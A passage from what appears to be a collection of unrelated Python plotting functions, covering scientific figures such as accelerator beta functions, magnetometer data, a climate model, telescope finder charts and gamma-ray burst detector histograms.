lege.legendHandles:\n l.set_linewidth(10)\n pl.savefig(os.path.join(P.output_directory, 'dhdl_TI.pdf'))\n pl.close(fig)\n return", "def display4(*args):\n #-------------------- unpack\n twiss_func = args[0]\n cos_like = args[1]\n sin_like = args[2]\n lat_plot = args[3]\n #-------------------- beta x,y & dispersion x\n s = [twiss_func(i,'s') for i in range(twiss_func.nbpoints)] # Abszisse\n bx = [twiss_func(i,'bx') for i in range(twiss_func.nbpoints)] # beta x\n by = [twiss_func(i,'by') for i in range(twiss_func.nbpoints)] # beta y\n dx = [twiss_func(i,'dx') for i in range(twiss_func.nbpoints)] # dispersion x\n#-------------------- longitudinal trajectories\n z1= [cos_like(i,'s') for i in range(cos_like.nbpoints)]\n cz= [cos_like(i,'cz') for i in range(cos_like.nbpoints)]\n cdp= [cos_like(i,'cdp') for i in range(cos_like.nbpoints)]\n\n z2= [sin_like(i,'s') for i in range(sin_like.nbpoints)]\n sz= [sin_like(i,'sz') for i in range(sin_like.nbpoints)]\n sdp= [sin_like(i,'sdp') for i in range(sin_like.nbpoints)]\n #-------------------- lattice viseo\n vzero = [0. for i in range(lat_plot.nbpoints)] # zero line\n vis_abszisse = [lat_plot(i,'s') for i in range(lat_plot.nbpoints)]\n vis_ordinate = [lat_plot(i,'viseo') for i in range(lat_plot.nbpoints)]\n #-------------------- figure frame\n width=14; height=7.6\n # fighdr = 'lattice version = {}, input file = {}'.format(PARAMS['lattice_version'],PARAMS['input_file'])\n fig = plt.figure(num=1,figsize=(width,height),facecolor='#eaecef',tight_layout=False)\n\n #-------------------- beta functions\n splot211=plt.subplot(211)\n splot211.set_title('beta x,y')\n # mapping box\n splot211.text(0.01, 1.1, UTIL.FLAGS.get('mapping'),transform=splot211.transAxes,fontsize=8,bbox=dict(boxstyle='round',facecolor='wheat',alpha=0.5),verticalalignment='top')\n # function plots\n plt.plot(s,bx, label=r\"$\\beta$x [m]\", color='black', linestyle='-')\n plt.plot(s,by, label=r\"$\\beta$y [m]\", color='red', linestyle='-')\n plt.plot(s,dx, label=r'$\\eta_x$ [m]' , color='green', linestyle='-') # dispersion x\n vscale=splot211.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n plt.plot(vis_abszisse,viseoz,label='',color='black')\n plt.plot(vis_abszisse,vzero,color='green',linestyle='--')\n # zero line\n splot211.plot(vis_abszisse,vzero,color='green',linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n\n #-------------------- longitudinal tracks z, dP/P\n # ax_l = left abszisse\n ax_l=plt.subplot(212)\n # ax_l=plt.subplot(10,1,(7,9))\n ax_l.set_title('synchrotron oscillation')\n ax_l.set_ylabel(r\"z [mm]\")\n ax_l.tick_params(axis='y', colors='green')\n ax_l.yaxis.label.set_color('green')\n ax_l.plot(z1,cz,label='C',color='green')\n ax_l.plot(z2,sz,label='S',color='green',linestyle=':')\n plt.legend(loc='lower left',fontsize='x-small')\n # ax_r = right abszisse\n ax_r = ax_l.twinx()\n ax_r.set_ylabel(r'$\\Delta$p/p [%]')\n ax_r.tick_params(axis='y', colors='red')\n ax_r.yaxis.label.set_color('red')\n ax_r.plot(z2,cdp,label='C',color='red')\n ax_r.plot(z2,sdp,label='S',color='red',linestyle=':')\n ax_r.plot(vis_abszisse,vzero,color='red', linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n # lattice elements\n vscale=ax_l.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n ax_l.plot(vis_abszisse,viseoz,label='',color='black')\n ax_l.plot(vis_abszisse,vzero,color='green',linestyle='--')", "def generatePlot(data):\n addendum = \"\"\n destination = \"D:\\\\Research\\\\scripts\\\\Results\\\\FullSet1\\\\$FilteredPlots\\\\take 4\\\\\"\n if len(data.detections.smallIncrease) != 0:\n addendum = \"small increases\\\\\"\n if len(data.detections.smallDecrease) != 0:\n addendum = \"small decreases\\\\\"\n if len(data.detections.largeIncrease) != 0:\n addendum = \"large increases\\\\\"\n if len(data.detections.largeDecrease) != 0:\n addendum = \"large decreases\\\\\"\n if addendum == \"\":\n addendum = \"no decreases\\\\\"\n \n plt.figure(1)\n plt.subplot(211)\n #print np.min(data.magdata), np.max(data.magdata)\n axes = plt.gca()\n axes.set_title(\"Year: '{year}, Day: {day}\".format(year=data.calendarDay[:2], day=data.calendarDay[3:] ))\n axes.set_ylim([np.min(data.magdata)-1.2,np.max(data.magdata)+0.25])\n axes.set_ylabel(r'$\\mathbf{B}$ (nT)' )\n\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes.xaxis.set_major_locator(dates.MinuteLocator())\n axes.xaxis.set_major_formatter(formats)\n \n br, = pp.plot(dates.date2num(data.timestamps),[row[0] for row in data.magdata],label='$B_r$')\n bt, = pp.plot(dates.date2num(data.timestamps),[row[1] for row in data.magdata],label='$B_t$')\n bn, = pp.plot(dates.date2num(data.timestamps),[row[2] for row in data.magdata],label='$B_n$')\n b0, = pp.plot(dates.date2num(data.timestamps),[row[3] for row in data.magdata],label='$B_0$')\n print len(data.detections.rotationBoundary)\n if len(data.detections.rotationBoundary) == 1:\n rotation, = pp.plot([dates.date2num(data.detections.rotationBoundary), dates.date2num(data.detections.rotationBoundary)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n else:\n for index, value in enumerate(data.detections.rotationBoundary):\n rotation, = pp.plot([dates.date2num(value), dates.date2num(value)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n if len(data.detections.rotationBoundary) != 0:\n pp.legend(handles=[br,bt,bn,b0,rotation], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n else:\n pp.legend(handles=[br,bt,bn,b0], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n\n start, end = axes.get_xlim()\n axes.xaxis.set_ticks(np.arange(start, end, (end-start)/5))\n \n \n\n plt.subplot(212)\n axes2 = plt.gca()\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes2.xaxis.set_major_locator(dates.MinuteLocator())\n axes2.xaxis.set_major_formatter(formats)\n axes2.set_ylabel(r'$\\theta$ (deg)' )\n rotations, = pp.plot(dates.date2num(data.detections.rotationTimeTags),data.detections.rotations)\n #pp.legend(handles=[rotations], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n \n\n outplotname = 'Plot ' + str(len(os.listdir(destination+addendum)) + 1)+ ' ' + data.timestamps[0].strftime('%y-%j-%H%M%S') + '.pdf'\n completename = os.path.join(destination+addendum,outplotname)\n plt.savefig(completename, bboxinches='tight')\n plt.clf()\n\n outplotname = 'Plot ' + str(len(os.listdir(destination+'rawdata\\\\'+addendum)) + 1)+ ' ' + data.timestamps[0].strftime('%y-%j-%H%M%S') + ' rawdata.csv'\n completename1 = os.path.join(destination+'rawdata\\\\'+addendum,outplotname)\n generateDataFile(data.rawdata,completename1)\n\n print \"Done generating plot...\"", "def plot_tcv(self):\n self.plot_profiles(0, title='Shot #{:d} @ t={:.2f} s'.format(self.shot, self.t))", "def plot(frame, clipped, auto, lag, threshold, freq, save):\n fig, axes = plt.subplots(4, constrained_layout=True)\n fig.set_size_inches(8.0, 8.0)\n fig.canvas.set_window_title('Excercise 4')\n\n ax_frame, ax_clipped, ax_auto, ax_freq = axes\n\n time = np.linspace(0, frame.size / SAMPLE_RATE, num=frame.size)\n for ax in axes:\n ax.set_xlabel('time [s]')\n ax.set_ylabel('y')\n\n\n ax_frame.plot(time, frame)\n ax_clipped.plot(time, clipped)\n\n ax_auto.plot(auto)\n ax_auto.axvline(threshold, color='black', label='Threshold')\n ax_auto.stem([lag[0]], [lag[1]], linefmt='r-', basefmt=None, label='Lag')\n\n ax_freq.plot(freq[0], 'g-', label='mask-on')\n ax_freq.plot(freq[1], 'r-', label='mask-off')\n\n ax_auto.legend(loc=1)\n ax_freq.legend(loc=0)\n\n ax_frame.set_title('Maskon frame')\n ax_clipped.set_title('Central clipping with 70%')\n ax_auto.set_title('Autocorrelation')\n ax_freq.set_title('Primary frequencies of frames')\n\n ax_auto.set_xlabel('frames')\n ax_freq.set_xlabel('frames')\n\n ax_freq.set_ylabel('f0')\n\n if save:\n save_figure(fig, 'ex4')\n else:\n plt.show()", "def make_plot(solution, t, plot_Ts, plot_T1, plot_T2, xaxis, cc, delta_cc, albedo,delta_albedo\\\n , em1, delta_em1, em2, delta_em2):\n\n plt.close('all')\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n \n if xaxis == 'cloud cover':\n inc_cc = []\n for i in range(len(solution[0,:])):\n inc_cc.append(cc + (i*delta_cc)/calcs_per_timestep)\n\n if plot_Ts == 'On': ax1.plot(inc_cc,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_cc,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_cc,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n\n elif xaxis == 'time':\n \n #for i in range(len(solution[0,:])):\n #t.append(i*(timestep/calcs_per_timestep))\n \n if plot_Ts == 'On': ax1.plot(t,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(t,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(t,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'albedo':\n inc_alb = []\n for i in range(len(solution[0,:])):\n inc_alb.append(albedo+(i*delta_albedo)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_alb,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_alb,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_alb,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon1':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em1+(i*delta_em1)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon2':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em2+(i*delta_em2)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n else: raise ValueError('No x axis selected')\n \n fig.suptitle('Global Average Temperature')\n ax1.set_title(f'Final Surface Temperature = {round(solution[0,-1],2)} K')\n ax1.legend()\n\n if xaxis == 'cloud cover': ax1.set_xlabel('Cloud Cover (%)')\n elif xaxis == 'time': ax1.set_xlabel('Time (years)')\n elif xaxis == 'albedo': ax1.set_xlabel('Albedo')\n elif xaxis == 'epsilon1': ax1.set_xlabel(u'\\u03B5\\u2081')\n elif xaxis == 'epsilon2': ax1.set_xlabel(u'\\u03B5\\u2082')\n plt.ylabel('Temerature (K)')\n return fig", "def _init_plot(self) -> None:\n\n # create a grayscale plot\n out = sys.stdout\n sys.stdout = open(\"/dev/null\", \"w\")\n hdu = self.image_generator.image(self.ra, self.dec)\n self.plot = aplpy.FITSFigure(hdu)\n self.plot.show_grayscale()\n self.plot.set_theme(\"publication\")\n sys.stdout = out\n\n # label for the position angle\n pa_string = \"PA = %.1f\" % self.mode_details.position_angle().to_value(u.deg)\n if self.mode_details.automated_position_angle():\n pa_string += \" (auto)\"\n self.draw_label(0.95, -0.05, pa_string, style=\"italic\", weight=\"bold\")\n\n # label for the title\n if self.title:\n self.draw_label(\n 0.5, 1.03, self.title, style=\"italic\", weight=\"bold\", size=\"large\"\n )\n\n # label for the image source\n self.draw_label(\n -0.05,\n -0.05,\n \"%s\" % self.image_generator.source(),\n style=\"italic\",\n weight=\"bold\",\n )\n\n # grid overlay\n self.plot.add_grid()\n self.plot.grid.set_alpha(0.2)\n self.plot.grid.set_color(\"b\")\n\n # indicate the RSS field of view\n self.draw_circle(self.ra, self.dec, 4.0 * u.arcmin, \"g\")\n self.draw_label(\n 0.79,\n 0.79,\n \"RSS\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n horizontalalignment=\"left\",\n color=(0, 0, 1),\n )\n\n # indicate the Salticam field of view\n self.draw_circle(self.ra, self.dec, 5.0 * u.arcmin, \"g\")\n self.draw_label(\n 0.86,\n 0.86,\n \"SCAM\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n horizontalalignment=\"left\",\n color=(0, 0, 1),\n )\n\n # labels for north and east direction\n self.draw_label(\n self.ra,\n self.dec + 4.8 * u.arcmin,\n \"N\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n color=(0, 0.5, 1),\n )\n self.draw_label(\n self.ra + 4.8 * u.arcmin / np.abs(np.cos(self.dec)),\n self.dec,\n \"E\",\n style=\"italic\",\n weight=\"bold\",\n size=\"large\",\n horizontalalignment=\"right\",\n color=(0, 0.5, 1),\n )\n\n # add cross hairs\n self.draw_centered_line(\n 0 * u.deg,\n 8 * u.arcmin,\n self.ra,\n self.dec,\n color=\"g\",\n linewidth=0.5,\n alpha=1.0,\n )\n self.draw_centered_line(\n 90 * u.deg,\n 8 * u.arcmin,\n self.ra,\n self.dec,\n color=\"g\",\n linewidth=0.5,\n alpha=1.0,\n )\n\n # label for the magnitude range and bandpass\n if self.magnitude_range:\n self._show_magnitudes()\n\n # add mode specific content\n if not self.basic_annotations:\n self.mode_details.annotate_finder_chart(self)", "def plot_vis_test(plotfile,pdf_file):\n\t# First some parameters looked up from configfile---------------------------------\n\t\n\tgrbdir = runconf['l2file'][0:10]\n\tpre_tstart = runconf['bkg1start']\n\tpre_tend = runconf['bkg1end']\n\ttrigtime = runconf['trigtime']\n\tgrb_tstart = runconf['transtart']\n\tgrb_tend = runconf['tranend']\n\tpost_tstart = runconf['bkg2start']\n\tpost_tend = runconf['bkg2end']\n\tt_src = grb_tend - grb_tstart \n\tt_tot = (pre_tend-pre_tstart)+(post_tend-post_tstart)\n\tra_tran = runconf['ra']\n\tdec_tran = runconf['dec']\n\tlc_bin = runconf['lc_bin']\n\talpha = runconf['alpha']\n\tbeta = runconf['beta']\n\tE0 = runconf['E0']\n\tA = runconf['A']\n\tsim_scale = t_src\n\tpixbin = int(runconf['pixsize'])\n\tcomp_bin = int(runconf['comp_bin'])\n\ttyp = runconf['typ']\n\n\t# Calling txy to calculate thetax thetay and the coordinates----------------------\n\t\n\tthetax,thetay,x,y,z,t = txy(runconf['mkffile'], trigtime, ra_tran, dec_tran)\n\t\n\t# Plot the 3d visualisation for the position of the transient---------------------\n\tplt.figure()\n\tfig = visualize_3d(grbdir,x,y,z, t, thetax, thetay, grbdir)\t\n\tpdf_file.savefig(fig)\n\t\n\t# Plotting the lightcurves for the four quadrants---------------------------------\n\tfig = plt.figure()\n\tclean_file = fits.open(runconf['infile'])\n\tplt.title('Light curves for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\t\n\tquad0 = clean_file[1].data\n\tdata0,bin_edge = np.histogram(quad0['time'], bins=np.arange(quad0['time'][0],quad0['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data0,label='Quad 0',lw=0.7)\n quad1 = clean_file[2].data\n\tdata1,bin_edge = np.histogram(quad1['time'], bins=np.arange(quad1['time'][0],quad1['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data1,label='Quad 1',lw=0.7) \n\tquad2 = clean_file[3].data\n\tdata2,bin_edge = np.histogram(quad2['time'], bins=np.arange(quad2['time'][0],quad2['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data2,label='Quad 2',lw=0.7)\n quad3 = clean_file[4].data\n data3,bin_edge = np.histogram(quad3['time'], bins=np.arange(quad3['time'][0],quad3['time'][-1],lc_bin))\n plt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data3,label='Quad 3',lw=0.7)\n\tplt.axvspan(grb_tstart,grb_tend,color='blue',alpha=0.1,label='GRB')\n\tplt.axvspan(pre_tstart,pre_tend,color='orange',alpha=0.2)\n\tplt.axvspan(post_tstart,post_tend,color='orange',alpha=0.2,label='Background')\n\tplt.legend(prop={'size':6})\n\tplt.xlim(pre_tstart-100,post_tend+100)\n\tpdf_file.savefig(fig)\n\t\n\t# Calling the sim_dph--------------------------------------------------------------\n\t\n\tgrb_flat,bkgd_flat,grb_dph,bkgd_dph,t_src,t_total = data_bkgd_image(grbdir,pre_tstart,pre_tend,grb_tstart,grb_tend,post_tstart,post_tend)\n\n\tsim_flat,sim_dph,badpix_mask,sim_err_dph = simulated_dph(grbdir,typ,t_src,alpha,beta,E0,A)\n\n\tsrc_dph = grb_dph-bkgd_dph*t_src/t_tot\n\n print \"Total counts in simulated dph: \",(sim_dph).sum()\n print \"Total counts after badpix mask is applied: \",(sim_dph*badpix_mask).sum()\n\tprint \"Excess counts in badpix masked src dph: \",(src_dph*badpix_mask).sum()\n \n\t# Plotting the DPHs before badpix correction---------------------------------------\n\t\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs before badpix correction for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 - 0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\n\t # Source \n\tim = ax4.imshow(src_dph,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n \t# Source + Background\n\tim = ax1.imshow(grb_dph,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\n \t# Background\n\tim = ax2.imshow(bkgd_dph*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\t\n\t# Plotting the Badpix mask---------------------------------------------\n\n\tfig = plt.figure()\n\tax = plt.subplot(111)\n\tplt.title('Badpix Mask for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\tim = ax.imshow(badpix_mask,interpolation='none')\n\tax.set_xlim(-9,128 -0.5)\n\tax.axvline(x=-5.,ymin=0,ymax=64,linewidth=5,color='k')\n\tax.spines['left'].set_position(('data',-0.5))\n\tax.xaxis.set_ticks(np.arange(0,128,16))\n\tax.yaxis.set_ticks(np.arange(0,128,16))\n\tfig.colorbar(im,ax=ax,fraction=0.046, pad=0.04)\n\t\n\tpdf_file.savefig(fig) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked graphs--------------------------------------------\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph*badpix_mask,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 -0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\n\t # Source \n\tim = ax4.imshow(src_dph*badpix_mask,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n\t # Source + Background\n\tim = ax1.imshow(grb_dph*badpix_mask,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\n\t # Background\n\tim = ax2.imshow(bkgd_dph*badpix_mask*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked graphs (Binned) ----------------------------------------------------\n\tfor p in [4,8,16]:\n\t\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\t\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay)+ \"pixsize=\"+str(p))\n\t\t # Sim\n\t\tim = ax3.imshow(resample(sim_dph*badpix_mask,p),interpolation='none')\n\t\tax3.set_title('Sim DPH',fontsize=8)\n\t\tax3.set_xlim(-1,128/p -0.5)\n\t\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax3.spines['left'].set_position(('data',-0.5))\n\t\tax3.set_yticklabels([])\n\t\tax3.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n\t\tax3.set_xticklabels(np.arange(0,128,16))\n\t\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source \n\t\tim = ax4.imshow(resample(src_dph*badpix_mask,p),interpolation='none',vmin=0)\n\t\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\t\tax4.set_xlim(-1,128/p -0.5)\n\t\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax4.spines['left'].set_position(('data',-0.5))\n\t\tax4.set_yticklabels([])\n ax4.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax4.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source + Background\n\t\tim = ax1.imshow(resample(grb_dph*badpix_mask,p),interpolation='none')\n\t\tax1.set_title('Src + Bkg DPH',fontsize=10)\n\t\tax1.set_xlim(-1,128/p -0.5)\n\t\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax1.spines['left'].set_position(('data',-0.5))\n\t\tax1.set_yticklabels([])\n ax1.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax1.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Background\n\t\tim = ax2.imshow(resample(bkgd_dph*badpix_mask*t_src/t_total,p),interpolation='none')\n\t\tax2.set_title('Bkg DPH',fontsize=8)\n\t\tax2.set_xlim(-1,128/p -0.5)\n\t\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax2.spines['left'].set_position(('data',-0.5))\n\t\tax2.set_yticklabels([])\n ax2.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax2.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\t\tf.set_size_inches([6.5,6.5])\n\t\t\n\t\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\tprint \"No. of pixels with zero counts in sim_dph: \",sim_dph[sim_dph==0].size\n\tprint \"No. of pixels with zero counts in grb_dph(no bkg subtration): \",grb_dph[grb_dph==0].size\n\t\n\t# Generating the array for module number ------------------------------------------------\n\tA = ['A'+str(i) for i in range(16)]\n\tB = np.flip(['B'+str(i) for i in range(16)],0)\n\tC = np.flip(['C'+str(i) for i in range(16)],0)\n\tD = ['D'+str(i) for i in range(16)]\n\tquad_a = np.reshape(A,(4,4))\n\tquad_b = np.reshape(B,(4,4))\n\tquad_c = np.reshape(C,(4,4))\n\tquad_d = np.reshape(D,(4,4))\n\tMod_arr = np.ndarray((8,8),dtype='|S3')\n\tMod_arr[:4,:4] = quad_a\n\tMod_arr[:4,4:] = quad_b\n\tMod_arr[4:,4:] = quad_c\n\tMod_arr[4:,:4] = quad_d\n\tMod_names = Mod_arr.flatten()\n\t#print \"Module name array : \",Mod_names\n\t#-----------------------------------------------------------------------------------------\n\t\t\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\tmodel = sim_flat_bin\n\tmodel_copy = np.copy(model)\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\tdata_copy = np.copy(data)\n\t\n\terr_src = grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\terr_model = sim_err_flat_bin\n\terr_model_copy = np.copy(err_model)\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\terr_data_copy = np.copy(err_data)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} 